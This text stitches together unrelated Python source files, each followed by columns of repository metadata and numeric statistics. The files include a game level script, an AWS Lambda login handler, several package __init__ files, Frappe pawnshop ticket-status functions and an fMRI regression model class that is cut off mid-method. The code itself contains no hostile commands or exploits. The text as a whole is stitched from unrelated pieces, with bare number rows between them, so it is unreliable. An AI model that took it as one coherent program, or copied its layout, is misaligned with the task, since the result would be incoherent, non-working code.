lb.addObject(Nut.NutSprite(x=156, y=288,width=32,height=32,restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Beam.BeamSprite(x=69, y=306,width=23,height=14,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Enemy.EnemySprite(x=331, y=77,width=32,height=32,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Enemy'))
lb.addObject(Enemy.EnemySprite(x=146, y=110,width=32,height=32,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Enemy'))
lb.addObject(Enemy.EnemySprite(x=188, y=202,width=32,height=32,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Enemy'))
lb.addObject(Enemy.EnemySprite(x=320, y=222,width=32,height=32,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Enemy'))
lb.addObject(Enemy.EnemySprite(x=458, y=297,width=32,height=32,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Enemy'))
lb.render()
| 2,957
| 2,957
| 0.747717
| 497
| 2,957
| 4.424547
| 0.201207
| 0.105048
| 0.082765
| 0.120964
| 0.836289
| 0.709868
| 0.686221
| 0.686221
| 0.672124
| 0.672124
| 0
| 0.106198
| 0.028745
| 2,957
| 1
| 2,957
| 2,957
| 0.659471
| 0
| 0
| 0
| 0
| 0
| 0.087897
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.076923
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
dc8ac76081e452d9e85dff1b0e64bd1e5e3e71c3
| 2,200
|
py
|
Python
|
sites/pycharm-guide/demos/tutorials/intro-aws/authentication/app.py
|
stevewhitmore/jetbrains_guide
|
234eb44a3ecc670048e4d02b3b5b39affe4a9e31
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 16
|
2019-02-01T14:03:53.000Z
|
2019-08-18T13:57:33.000Z
|
sites/pycharm-guide/demos/tutorials/intro-aws/authentication/app.py
|
stevewhitmore/jetbrains_guide
|
234eb44a3ecc670048e4d02b3b5b39affe4a9e31
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 3
|
2019-03-22T07:40:33.000Z
|
2019-04-03T16:04:35.000Z
|
sites/pycharm-guide/demos/tutorials/intro-aws/authentication/app.py
|
stevewhitmore/jetbrains_guide
|
234eb44a3ecc670048e4d02b3b5b39affe4a9e31
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 2
|
2019-03-25T15:00:12.000Z
|
2019-08-18T13:57:36.000Z
|
import ujson
from marshmallow import ValidationError
from .utils import validator
def lambda_handler(event, context):
try:
body = ujson.loads(event['body'])
result = validator.UserLoginSchema()
res = not bool(result.validate(body))
if res:
return {
"statusCode": 200,
"body": ujson.dumps({
"message": "Welcome !",
"data": {
"token": result.load(body)['token']
}
})
}
else:
return {
"statusCode": 400,
"body": ujson.dumps({
"message": "Error !",
"data": result.validate(body)
})
}
except ValidationError as err:
return {
"statusCode": 400,
"body": ujson.dumps({
"message": err.messages
})
}
except KeyError as error:
return {
"statusCode": 400,
"body": ujson.dumps({
"message": "Something went wrong. Unable to parse data ! " + str(error)
})
}
def token_refresh(event, context):
try:
body = ujson.loads(event['body'])
result = validator.RefreshTokenSchema()
res = not bool(result.validate(body))
if res:
return {
"statusCode": 200,
"body": ujson.dumps({
"message": None,
"data": result.load(body)
})
}
else:
return {
"statusCode": 400,
"body": ujson.dumps({
"message": "Error !",
"data": result.validate(body)
})
}
except ValidationError as err:
return {
"statusCode": 400,
"body": ujson.dumps({
"message": err.messages
})
}
except KeyError:
return {
"statusCode": 400,
"body": ujson.dumps({"message": "Something went wrong. Unable to parse data !"})
}
| 26.829268
| 92
| 0.425
| 168
| 2,200
| 5.553571
| 0.291667
| 0.096463
| 0.120043
| 0.180064
| 0.778135
| 0.778135
| 0.778135
| 0.778135
| 0.778135
| 0.778135
| 0
| 0.020253
| 0.461364
| 2,200
| 82
| 93
| 26.829268
| 0.767089
| 0
| 0
| 0.657534
| 0
| 0
| 0.142662
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027397
| false
| 0
| 0.041096
| 0
| 0.178082
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
dc8d261bf2c60b0760a0e581ebfb9377f3bf4e04
| 29
|
py
|
Python
|
brabeion/__init__.py
|
affan2/brabeion
|
381337bada416c9f20d6852b1725a310cdbf85b7
|
[
"BSD-3-Clause"
] | null | null | null |
brabeion/__init__.py
|
affan2/brabeion
|
381337bada416c9f20d6852b1725a310cdbf85b7
|
[
"BSD-3-Clause"
] | null | null | null |
brabeion/__init__.py
|
affan2/brabeion
|
381337bada416c9f20d6852b1725a310cdbf85b7
|
[
"BSD-3-Clause"
] | 1
|
2020-01-08T09:06:26.000Z
|
2020-01-08T09:06:26.000Z
|
from .internals import badges
| 29
| 29
| 0.862069
| 4
| 29
| 6.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 29
| 1
| 29
| 29
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
dc9cfa6c69c17c13ed9d9dd55998cdeaf172ed61
| 177
|
py
|
Python
|
kaulos/__init__.py
|
mkturkcan/Kaulos
|
681dc7d00eebd370061f0ff64eaf167ada39194e
|
[
"MIT"
] | 3
|
2019-09-17T22:20:01.000Z
|
2020-02-16T03:29:14.000Z
|
kaulos/__init__.py
|
mkturkcan/Kaulos
|
681dc7d00eebd370061f0ff64eaf167ada39194e
|
[
"MIT"
] | null | null | null |
kaulos/__init__.py
|
mkturkcan/Kaulos
|
681dc7d00eebd370061f0ff64eaf167ada39194e
|
[
"MIT"
] | 1
|
2019-10-02T15:24:08.000Z
|
2019-10-02T15:24:08.000Z
|
from __future__ import absolute_import
__version__ = '0.1.0'
from .compact_dependencies import *
from .kaulos_engine import *
from .kaulos_models import *
from .kaulos import *
| 25.285714
| 38
| 0.79661
| 24
| 177
| 5.375
| 0.5
| 0.232558
| 0.372093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019481
| 0.129944
| 177
| 6
| 39
| 29.5
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0.028249
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.833333
| 0
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f4945d68dcc1716694575471ae0afb99ddf11e5e
| 58
|
py
|
Python
|
rlberry/agents/kovi/__init__.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
rlberry/agents/kovi/__init__.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
rlberry/agents/kovi/__init__.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
# from .kovi import KOVIAgent
from .kovi2 import KOVIAgent
| 29
| 29
| 0.810345
| 8
| 58
| 5.875
| 0.625
| 0.638298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02
| 0.137931
| 58
| 2
| 30
| 29
| 0.92
| 0.465517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f49f8c22dcd5a61861e6b412106bc7f4d7dbc64e
| 1,067
|
py
|
Python
|
pyautofinance/tests/__init__.py
|
webclinic017/PyAutoFinance
|
532cb1c5418dd9eeb07f2f08646170cde1fe0303
|
[
"MIT"
] | null | null | null |
pyautofinance/tests/__init__.py
|
webclinic017/PyAutoFinance
|
532cb1c5418dd9eeb07f2f08646170cde1fe0303
|
[
"MIT"
] | null | null | null |
pyautofinance/tests/__init__.py
|
webclinic017/PyAutoFinance
|
532cb1c5418dd9eeb07f2f08646170cde1fe0303
|
[
"MIT"
] | 1
|
2022-02-24T09:18:13.000Z
|
2022-02-24T09:18:13.000Z
|
from pyautofinance.tests.test_back_datafeed import TestBackDatafeed
from pyautofinance.tests.test_brokers import TestBrokers
from pyautofinance.tests.test_ccxt_datafeed import TestCCXTDatafeed
from pyautofinance.tests.test_config import TestConfig
from pyautofinance.tests.test_dataflux import TestDataflux
from pyautofinance.tests.test_engine import TestEngine
from pyautofinance.tests.test_extractors import TestExtractors
from pyautofinance.tests.test_learn import TestLearn
from pyautofinance.tests.test_monkey_simulator import TestMonkeySimulator
from pyautofinance.tests.test_monkey_strat import TestMonkeyStrat
from pyautofinance.tests.test_monte_carlo_simulator import TestMonteCarloSimulator
from pyautofinance.tests.test_ohlcv import TestOHLCV
from pyautofinance.tests.test_plotting import TestPlotting
from pyautofinance.tests.test_results import TestResults
from pyautofinance.tests.test_testers import TestTesters
from pyautofinance.tests.test_timers import TestTimers
from pyautofinance.tests.test_walk_forward_simulator import TestWalkForwardSimulator
| 59.277778
| 84
| 0.904405
| 127
| 1,067
| 7.401575
| 0.338583
| 0.307447
| 0.397872
| 0.470213
| 0.068085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06373
| 1,067
| 17
| 85
| 62.764706
| 0.940941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f4a7df5bd3772ada7afa405dd78d9d790ae670ce
| 34
|
py
|
Python
|
plugins/hw_wallet/__init__.py
|
benma/electrum
|
fbe27fce045d5b44a71a6612716ded9103ed77dd
|
[
"MIT"
] | null | null | null |
plugins/hw_wallet/__init__.py
|
benma/electrum
|
fbe27fce045d5b44a71a6612716ded9103ed77dd
|
[
"MIT"
] | null | null | null |
plugins/hw_wallet/__init__.py
|
benma/electrum
|
fbe27fce045d5b44a71a6612716ded9103ed77dd
|
[
"MIT"
] | null | null | null |
from .plugin import HW_PluginBase
| 17
| 33
| 0.852941
| 5
| 34
| 5.6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
525a65df92062e1c846ab7c998aeb3b8788896e0
| 239
|
py
|
Python
|
Data/Data.py
|
rohitjain00/Trading-Bot
|
c31967b464d4372d60c28d5e9ef308d4cacffbeb
|
[
"Apache-2.0"
] | 2
|
2020-05-17T07:44:48.000Z
|
2020-05-26T06:11:40.000Z
|
Data/Data.py
|
rohitjain00/Trading-Bot
|
c31967b464d4372d60c28d5e9ef308d4cacffbeb
|
[
"Apache-2.0"
] | null | null | null |
Data/Data.py
|
rohitjain00/Trading-Bot
|
c31967b464d4372d60c28d5e9ef308d4cacffbeb
|
[
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
class Data(ABC):
@abstractmethod
def data_from(self):
pass
@abstractmethod
def get_train_data(self):
pass
@abstractmethod
def get_new_data(self):
pass
| 14.9375
| 35
| 0.635983
| 28
| 239
| 5.25
| 0.428571
| 0.346939
| 0.29932
| 0.340136
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.297071
| 239
| 15
| 36
| 15.933333
| 0.875
| 0
| 0
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0.272727
| 0.090909
| 0
| 0.454545
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
527e60dff45fbe65ad00cb7bdb5100fc06d0b325
| 5,782
|
py
|
Python
|
pawnshop_management/pawnshop_management/custom_codes/update_pawn_ticket.py
|
gpRabie/pawnshop_management
|
0f23246d25a448aaa28108888c0d4e31b668680b
|
[
"MIT"
] | null | null | null |
pawnshop_management/pawnshop_management/custom_codes/update_pawn_ticket.py
|
gpRabie/pawnshop_management
|
0f23246d25a448aaa28108888c0d4e31b668680b
|
[
"MIT"
] | null | null | null |
pawnshop_management/pawnshop_management/custom_codes/update_pawn_ticket.py
|
gpRabie/pawnshop_management
|
0f23246d25a448aaa28108888c0d4e31b668680b
|
[
"MIT"
] | 1
|
2022-03-18T06:50:55.000Z
|
2022-03-18T06:50:55.000Z
|
import frappe
from frappe.utils import today
@frappe.whitelist()
def update_pawn_tickets():
non_jewelry = frappe.db.get_all('Pawn Ticket Non Jewelry',
filters={
'workflow_state': 'Active'
},
pluck='name')
for i in range(len(non_jewelry)):
pawn_ticket=frappe.get_doc('Pawn Ticket Non Jewelry', non_jewelry[i])
print(type(pawn_ticket.expiry_date))
# if pawn_ticket.expiry_date) < str(today()):
# print("True")
@frappe.whitelist()
def change_pawn_ticket_nj_status_to_expire():
expired_pt = frappe.db.get_all('Pawn Ticket Non Jewelry',
filters={
'expiry_date': today(),
'workflow_state': "Active"
},
fields=['name']
)
for i in range(len(expired_pt)):
frappe.db.set_value('Pawn Ticket Non Jewelry', expired_pt[i].name, 'workflow_state', 'Expired')
frappe.db.commit()
change_pt_inventory_batch_and_items('Pawn Ticket Non Jewelry', expired_pt[i].name)
def change_pt_inventory_batch_and_items(pawn_ticket_type, pawn_ticket):
doc = frappe.get_doc(pawn_ticket_type, pawn_ticket)
if pawn_ticket_type == 'Pawn Ticket Non Jewelry':
for items in doc.get('non_jewelry_items'):
frappe.db.set_value('Non Jewelry Items', items.item_no, 'workflow_state', 'Collected')
frappe.db.commit()
frappe.db.set_value('Non Jewelry Batch', doc.inventory_tracking_no, 'workflow_state', 'Expired')
frappe.db.commit()
elif pawn_ticket_type == 'Pawn Ticket Jewelry':
for items in doc.get('jewelry_items'):
frappe.db.set_value('Jewelry Items', items.item_no, 'workflow_state', 'Collected')
frappe.db.commit()
frappe.db.set_value('Jewelry Batch', doc.inventory_tracking_no, 'workflow_state', 'Expired')
frappe.db.commit()
@frappe.whitelist()
def update_fields_after_status_change_collect_pawn_ticket(pawn_ticket_type, inventory_tracking_no, pawn_ticket_no):
frappe.db.set_value(pawn_ticket_type, pawn_ticket_no, 'change_status_date', today())
frappe.db.commit()
doc = frappe.get_doc(pawn_ticket_type, pawn_ticket_no)
if pawn_ticket_type == 'Pawn Ticket Non Jewelry':
for items in doc.get('non_jewelry_items'):
frappe.db.set_value('Non Jewelry Items', items.item_no, 'workflow_state', 'Collected')
frappe.db.commit()
frappe.db.set_value('Non Jewelry Batch', inventory_tracking_no, 'workflow_state', 'Expired')
frappe.db.commit()
@frappe.whitelist()
def update_fields_after_status_change_review_pawn_ticket(pawn_ticket_type, inventory_tracking_no, pawn_ticket_no):
frappe.db.set_value(pawn_ticket_type, pawn_ticket_no, 'change_status_date', today())
frappe.db.commit()
doc = frappe.get_doc(pawn_ticket_type, pawn_ticket_no)
if pawn_ticket_type == 'Pawn Ticket Non Jewelry':
for items in doc.get('non_jewelry_items'):
frappe.db.set_value('Non Jewelry Items', items.item_no, 'workflow_state', 'Returned')
frappe.db.commit()
frappe.db.set_value('Non Jewelry Batch', inventory_tracking_no, 'workflow_state', 'Returned')
frappe.db.commit()
@frappe.whitelist()
def update_fields_after_status_change_redeem_pawn_ticket(pawn_ticket_type, inventory_tracking_no, pawn_ticket_no):
frappe.db.set_value(pawn_ticket_type, pawn_ticket_no, 'change_status_date', today())
frappe.db.commit()
doc = frappe.get_doc(pawn_ticket_type, pawn_ticket_no)
if pawn_ticket_type == 'Pawn Ticket Non Jewelry':
for items in doc.get('non_jewelry_items'):
frappe.db.set_value('Non Jewelry Items', items.item_no, 'workflow_state', 'Redeemed')
frappe.db.commit()
frappe.db.set_value('Non Jewelry Batch', inventory_tracking_no, 'workflow_state', 'Redeemed')
frappe.db.commit()
@frappe.whitelist()
def update_fields_after_status_change_pull_out_pawn_ticket(pawn_ticket_type, inventory_tracking_no, pawn_ticket_no):
frappe.db.set_value(pawn_ticket_type, pawn_ticket_no, 'change_status_date', today())
frappe.db.commit()
doc = frappe.get_doc(pawn_ticket_type, pawn_ticket_no)
if pawn_ticket_type == 'Pawn Ticket Non Jewelry':
for items in doc.get('non_jewelry_items'):
frappe.db.set_value('Non Jewelry Items', items.item_no, 'workflow_state', 'Pull Out')
frappe.db.commit()
frappe.db.set_value('Non Jewelry Batch', inventory_tracking_no, 'workflow_state', 'Pull Out')
frappe.db.commit()
@frappe.whitelist()
def increment_b_series(branch):
if branch == "Rabie's House":
doc = frappe.get_doc("Non Jewelry Naming Series", "Rabie's House")
doc.b_series += 1
doc.save(ignore_permissions=True)
elif branch == "Garcia's Pawnshop - CC":
doc = frappe.get_doc("Non Jewelry Naming Series", "Garcia's Pawnshop - CC")
doc.b_series += 1
doc.save(ignore_permissions=True)
elif branch == "Garcia's Pawnshop - MOL":
doc = frappe.get_doc("Non Jewelry Naming Series", "Garcia's Pawnshop - MOL")
doc.b_series += 1
doc.save(ignore_permissions=True)
elif branch == "Garcia's Pawnshop - POB":
doc = frappe.get_doc("Non Jewelry Naming Series", "Garcia's Pawnshop - POB")
doc.b_series += 1
doc.save(ignore_permissions=True)
elif branch == "Garcia's Pawnshop - GTC":
doc = frappe.get_doc("Non Jewelry Naming Series", "Garcia's Pawnshop - GTC")
doc.b_series += 1
doc.save(ignore_permissions=True)
elif branch == "Garcia's Pawnshop - TNZ":
doc = frappe.get_doc("Non Jewelry Naming Series", "Garcia's Pawnshop - TNZ")
doc.b_series += 1
doc.save(ignore_permissions=True)
| 45.888889
| 116
| 0.686095
| 796
| 5,782
| 4.693467
| 0.103015
| 0.141863
| 0.074946
| 0.072805
| 0.890525
| 0.86697
| 0.827088
| 0.827088
| 0.771681
| 0.719754
| 0
| 0.001289
| 0.195088
| 5,782
| 126
| 117
| 45.888889
| 0.801461
| 0.01055
| 0
| 0.53211
| 0
| 0
| 0.238328
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073395
| false
| 0
| 0.018349
| 0
| 0.091743
| 0.009174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
529785de5c0c47c6e2c8d73d2ae066b26646de2d
| 26,356
|
py
|
Python
|
catreward/roi/exps/base2.py
|
parenthetical-e/fmri
|
32c5571d8767684ec6586320e85485cd89ed9327
|
[
"BSD-2-Clause"
] | 4
|
2018-02-11T16:18:46.000Z
|
2021-11-28T15:43:25.000Z
|
catreward/roi/exps/base2.py
|
parenthetical-e/fmri
|
32c5571d8767684ec6586320e85485cd89ed9327
|
[
"BSD-2-Clause"
] | null | null | null |
catreward/roi/exps/base2.py
|
parenthetical-e/fmri
|
32c5571d8767684ec6586320e85485cd89ed9327
|
[
"BSD-2-Clause"
] | 1
|
2018-05-23T10:28:22.000Z
|
2018-05-23T10:28:22.000Z
|
""" Another (sub)set of models, this one contains only those with literature
driven RL (or related) terms. Prior analyses were more exploratory.
In this set we allow for seperate regressors matching behavoiral accuracy,
as well as inverted and positive-value-only coding schemes. """
from roi.base import Mean
class Rewardrecode(Mean):
    """ A Roi analysis class, customized for the catreward project.

    Unlike Catreward, this reads in the average bold data from a
    text file. """

    def __init__(self, TR, roi_name, trials, durations, data):
        Mean.__init__(self, TR, roi_name, trials, durations, data)

        # The averaged BOLD signal is read from a text file named after
        # the ROI rather than extracted from a nifti volume.
        self.data['meta']['bold'] = self.roi_name

        self.create_bold(preprocess=True)
        self.create_hrf(function_name='double_gamma')

    def _fit_names(self, names):
        """ Shared model pipeline: record <names> as the design matrix
        metadata, build a parametric design matrix from them (no
        orthogonalization, no boxcar), then fit with z-score
        normalization.

        Every model_* method below differs only in the regressor names
        it passes to this helper. """

        self.data['meta']['dm'] = names
        self.create_dm_param(names=names, orth=False, box=False)
        self.fit(norm='zscore')

    # --
    # Accuracy
    def model_0101(self):
        """ Behavioral accuracy. """
        self._fit_names(['acc'])

    def model_0102(self):
        """ Behavioral accuracy, diminished by (exponential) similarity. """
        self._fit_names(['acc_exp'])

    def model_0103(self):
        """ Behavioral accuracy, diminished by (gaussian) similarity. """
        self._fit_names(['acc_gauss'])

    # --
    # Gains and losses
    def model_0201(self):
        """ Gains and losses. """
        self._fit_names(['gl'])

    def model_0202(self):
        """ Gains and losses, diminished by (exponential) similarity. """
        self._fit_names(['gl_exp'])

    def model_0203(self):
        """ Gains and losses, diminished by (gaussian) similarity. """
        self._fit_names(['gl_gauss'])

    # --
    # g/l into 2 regressors
    def model_0301(self):
        """ Gains and losses, in 2 regressors. """
        self._fit_names(['gl_1', 'gl_0'])

    def model_0302(self):
        """ Gains and losses, diminished by (exponential) similarity,
        in 2 regressors. """
        self._fit_names(['gl_exp_1', 'gl_exp_0'])

    def model_0303(self):
        """ Gains and losses, diminished by (gaussian) similarity,
        in 2 regressors. """
        self._fit_names(['gl_gauss_1', 'gl_gauss_0'])

    # --
    # Acc coding
    # RPE
    def model_0401(self):
        """ RPE - derived from accuracy. """
        self._fit_names(['rpe_acc'])

    def model_0402(self):
        """ RPE - derived from accuracy diminished by (exponential)
        similarity. """
        self._fit_names(['rpe_acc_exp'])

    def model_0403(self):
        """ RPE - derived from accuracy diminished by (gaussian)
        similarity. """
        self._fit_names(['rpe_acc_gauss'])

    # --
    # Acc coding
    ## VALUE
    def model_0501(self):
        """ Value - derived from accuracy. """
        self._fit_names(['value_acc'])

    def model_0502(self):
        """ Value - derived from accuracy diminished by (exponential)
        similarity. """
        self._fit_names(['value_acc_exp'])

    def model_0503(self):
        """ Value - derived from accuracy diminished by (gaussian)
        similarity. """
        self._fit_names(['value_acc_gauss'])

    # --
    # g/l coding
    ## RPE
    def model_0701(self):
        """ RPE - derived from gains and losses. """
        self._fit_names(['rpe_gl'])

    def model_0702(self):
        """ RPE - derived from gains and losses diminished by (exponential)
        similarity. """
        self._fit_names(['rpe_gl_exp'])

    def model_0703(self):
        """ RPE - derived from gains and losses diminished by (gaussian)
        similarity. """
        self._fit_names(['rpe_gl_gauss'])

    # --
    # g/l coding
    ## VALUE
    def model_0801(self):
        """ Value - derived from gains and losses. """
        self._fit_names(['value_gl'])

    def model_0802(self):
        """ Value - derived from gains and losses diminished by (exponential)
        similarity. """
        self._fit_names(['value_gl_exp'])

    def model_0803(self):
        """ Value - derived from gains and losses diminished by (gaussian)
        similarity. """
        self._fit_names(['value_gl_gauss'])

    # --
    # g/l coding, into 2 regressors
    ## RPE
    def model_0901(self):
        """ RPE - derived from gains and losses. """
        self._fit_names(['rpe_gl_1', 'rpe_gl_0'])

    def model_0902(self):
        """ RPE - derived from gains and losses diminished by (exponential)
        similarity. """
        self._fit_names(['rpe_gl_exp_1', 'rpe_gl_exp_0'])

    def model_0903(self):
        """ RPE - derived from gains and losses diminished by (gaussian)
        similarity. """
        self._fit_names(['rpe_gl_gauss_1', 'rpe_gl_gauss_0'])

    # --
    # g/l coding, into 2 regressors
    ## VALUE
    def model_1001(self):
        """ Value - derived from gains and losses. """
        self._fit_names(['value_gl_1', 'value_gl_0'])

    def model_1002(self):
        """ Value - derived from gains and losses diminished by (exponential)
        similarity. """
        self._fit_names(['value_gl_exp_1', 'value_gl_exp_0'])

    def model_1003(self):
        """ Value - derived from gains and losses diminished by (gaussian)
        similarity. """
        self._fit_names(['value_gl_gauss_1', 'value_gl_gauss_0'])

    # --
    # INVERTED VALUES
    # --
    # Gains and losses INVERTED
    def model_1101(self):
        """ Gains and losses. Reward coding inverted. """
        self._fit_names(['gl_invert'])

    def model_1102(self):
        """ Gains and losses, diminished by (exponential) similarity.
        Reward coding inverted. """
        self._fit_names(['gl_exp_invert'])

    def model_1103(self):
        """ Gains and losses, diminished by (gaussian) similarity.
        Reward coding inverted. """
        self._fit_names(['gl_gauss_invert'])

    # --
    # g/l into 2 regressors INVERTED
    def model_1201(self):
        """ Gains and losses, in 2 regressors.
        Reward coding inverted. """
        self._fit_names(['gl_invert_1', 'gl_invert_0'])

    def model_1202(self):
        """ Gains and losses, diminished by (exponential) similarity,
        in 2 regressors. Reward coding inverted. """
        self._fit_names(['gl_exp_invert_1', 'gl_exp_invert_0'])

    def model_1203(self):
        """ Gains and losses, diminished by (gaussian) similarity,
        in 2 regressors. Reward coding inverted. """
        self._fit_names(['gl_gauss_invert_1', 'gl_gauss_invert_0'])

    # --
    # Acc coding INVERTED
    # RPE
    def model_1301(self):
        """ RPE - derived from accuracy. Reward coding inverted. """
        self._fit_names(['rpe_acc_invert'])

    def model_1302(self):
        """ RPE - derived from accuracy diminished by (exponential)
        similarity. Reward coding inverted. """
        self._fit_names(['rpe_acc_exp_invert'])

    def model_1303(self):
        """ RPE - derived from accuracy diminished by (gaussian)
        similarity. Reward coding inverted. """
        self._fit_names(['rpe_acc_gauss_invert'])

    # --
    # Acc coding
    ## VALUE
    def model_1401(self):
        """ Value - derived from accuracy. Reward coding inverted. """
        self._fit_names(['value_acc_invert'])

    def model_1402(self):
        """ Value - derived from accuracy diminished by (exponential)
        similarity. Reward coding inverted. """
        self._fit_names(['value_acc_exp_invert'])

    def model_1403(self):
        """ Value - derived from accuracy diminished by (gaussian)
        similarity. Reward coding inverted. """
        self._fit_names(['value_acc_gauss_invert'])

    # --
    # g/l coding
    ## RPE
    def model_1601(self):
        """ RPE - derived from gains and losses. Reward coding inverted. """
        self._fit_names(['rpe_gl_invert'])

    def model_1602(self):
        """ RPE - derived from gains and losses diminished by (exponential)
        similarity. Reward coding inverted. """
        self._fit_names(['rpe_gl_exp_invert'])

    def model_1603(self):
        """ RPE - derived from gains and losses diminished by (gaussian)
        similarity. Reward coding inverted. """
        self._fit_names(['rpe_gl_gauss_invert'])

    # --
    # g/l coding
    ## VALUE
    def model_1701(self):
        """ Value - derived from gains and losses. Reward coding inverted. """
        self._fit_names(['value_gl_invert'])

    def model_1702(self):
        """ Value - derived from gains and losses diminished by (exponential)
        similarity. Reward coding inverted. """
        self._fit_names(['value_gl_exp_invert'])

    def model_1703(self):
        """ Value - derived from gains and losses diminished by (gaussian)
        similarity. Reward coding inverted. """
        self._fit_names(['value_gl_gauss_invert'])

    # --
    # g/l coding, into 2 regressors
    ## RPE
    def model_1801(self):
        """ RPE - derived from gains and losses. Reward coding inverted. """
        self._fit_names(['rpe_gl_invert_1', 'rpe_gl_invert_0'])

    def model_1802(self):
        """ RPE - derived from gains and losses diminished by (exponential)
        similarity. Reward coding inverted. """
        self._fit_names(['rpe_gl_exp_invert_1', 'rpe_gl_exp_invert_0'])

    def model_1803(self):
        """ RPE - derived from gains and losses diminished by (gaussian)
        similarity. Reward coding inverted. """
        self._fit_names(['rpe_gl_gauss_invert_1', 'rpe_gl_gauss_invert_0'])

    # --
    # g/l coding, into 2 regressors
    ## VALUE
    def model_1901(self):
        """ Value - derived from gains and losses. Reward coding inverted. """
        self._fit_names(['value_gl_invert_1', 'value_gl_invert_0'])

    def model_1902(self):
        """ Value - derived from gains and losses diminished by (exponential)
        similarity. Reward coding inverted. """
